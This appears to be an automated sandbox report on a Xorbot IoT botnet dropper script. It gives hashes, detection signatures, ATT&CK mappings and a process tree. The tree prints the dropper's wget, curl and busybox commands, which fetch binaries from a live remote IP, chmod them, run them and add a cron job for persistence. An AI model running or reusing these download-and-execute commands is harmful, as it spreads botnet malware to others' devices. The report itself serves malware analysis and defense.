xorbot | 15a616d4490e07c93bf924aa389a6138a36498dd1ce9a99d067b572912efaaa1

Analysis

max time kernel
149s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
02/12/2024, 06:27

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

5e2529892d847c10549cfbb61d3e6161
SHA1

118830eed8aa9de5410fcf0da8acc71e7bfb28c9
SHA256

15a616d4490e07c93bf924aa389a6138a36498dd1ce9a99d067b572912efaaa1
SHA512

ab688f43a3cf57ba16fd5ac810921568df8d8be41eae5b7981322eab0415f46f532123dbe00cb8154a91aa80e976e6b94117c8a97c9ba776bd646e7103c3117b
SSDEEP

192:Y+hdDAY0WnU55HMFTftMEeFbbwYoDyfXL55HMVTftME1XeYoDyfX9hdDAY9:Y+hdDAY0WUnHMOFbbPnHMF7hdDAY9

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 3 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot
behavioral2/files/fstream-3.dat	family_xorbot
behavioral2/files/fstream-10.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Contacts a large (1904) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
694	chmod
712	chmod
735	chmod
846	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq	695	ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
/tmp/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8	714	CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
/tmp/uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU	736	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
/tmp/Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7	848	Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7

Renames itself 1 IoCs

pid	Process
737	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.UX1AOa	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 3 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/903/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1035/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/167/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/283/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/786/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1014/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/25/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/328/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/996/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/970/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/998/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/815/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/873/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/876/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/906/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1005/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/895/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/949/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/987/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1027/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1030/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/2/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/845/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/885/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/21/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/615/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/985/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/868/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/871/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/921/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/956/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/969/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1022/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/745/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/769/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/796/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1017/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/315/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/960/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/993/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/925/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/984/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1000/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1011/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/798/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/805/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/821/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/983/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1004/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/3/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/858/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/948/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/976/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/990/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1024/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/288/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/820/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/922/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/892/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/1044/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/506/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/819/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/883/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
File opened for reading	/proc/940/cmdline	uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
669	wget
684	curl
693	busybox
695	ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
697	rm

Writes file to tmp directory 10 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq	curl
File opened for modification	/tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq	busybox
File opened for modification	/tmp/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8	wget
File opened for modification	/tmp/uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU	wget
File opened for modification	/tmp/uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU	busybox
File opened for modification	/tmp/Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7	busybox
File opened for modification	/tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq	wget
File opened for modification	/tmp/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8	curl
File opened for modification	/tmp/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8	busybox
File opened for modification	/tmp/uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:660
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:663
- /usr/bin/wget
  wget http://216.126.231.240/bins/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:669
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:684
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:693
- /bin/chmod
  chmod 777 ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  ./ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:695
- /bin/rm
  rm ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - System Network Configuration Discovery
  PID:697
- /usr/bin/wget
  wget http://216.126.231.240/bins/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
  2⤵
  - Writes file to tmp directory
  PID:698
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:701
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
  2⤵
  - Writes file to tmp directory
  PID:708
- /bin/chmod
  chmod 777 CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
  2⤵
  - File and Directory Permissions Modification
  PID:712
- /tmp/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
  ./CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
  2⤵
  - Executes dropped EXE
  PID:714
- /bin/rm
  rm CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
  2⤵
  PID:716
- /usr/bin/wget
  wget http://216.126.231.240/bins/uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
  2⤵
  - Writes file to tmp directory
  PID:717
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:724
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
  2⤵
  - Writes file to tmp directory
  PID:731
- /bin/chmod
  chmod 777 uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
  2⤵
  - File and Directory Permissions Modification
  PID:735
- /tmp/uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
  ./uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:736
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:738
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:740
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:741
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:743
- /bin/rm
  rm uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU
  2⤵
  PID:747
- /usr/bin/wget
  wget http://216.126.231.240/bins/Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7
  2⤵
  PID:751
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7
  2⤵
  PID:752
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7
  2⤵
  - Writes file to tmp directory
  PID:834
- /bin/chmod
  chmod 777 Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7
  ./Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7
  2⤵
  - Executes dropped EXE
  PID:848
- /bin/rm
  rm Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7
  2⤵
  PID:849
- /usr/bin/wget
  wget http://216.126.231.240/bins/BSrgcku3mTS9tU2Y5adV1Zx1QsNjxDWMfx
  2⤵
  PID:850

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8

Filesize
117KB

MD5
849fa04ef88a8e8de32cb2e8538de5fe

SHA1
c768af29fe4b6695fff1541623e8bbd1c6f242f7

SHA256
8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

SHA512
2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

Download Submit
/tmp/Zx4azvVVohNmC7VJ2szshT63VeEdqHTht7

Filesize
119KB

MD5
1b166b95f9cb4b079ef1b9ec8363ddf3

SHA1
0d8eb08add467b3b5474f9b25909297fe7c2839c

SHA256
94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

SHA512
983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

Download Submit
/tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit
/tmp/uMqN6Wciqb94HyAj9Z6tWRq1GhdtMbzXEU

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/var/spool/cron/crontabs/tmp.UX1AOa

Filesize
210B

MD5
562ef6516f9fbdd6acb5657a8f7acd8e

SHA1
fdfcf0a74b8318af43ce218771002f54a59b9130

SHA256
a98b733b24f39f5655afec28c7f51fa66f7d0ee3063f4cbae91199c4ff140ff4

SHA512
a7723b0a56d6ae07bf6ed4b5d51fbf0fa9a2a2cc12e566db16f7a0b0d3d7e66151d6b4cddbbe8c8c8033f83cc170bc52c296195d1e5d5929bba54bd1936d5683

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads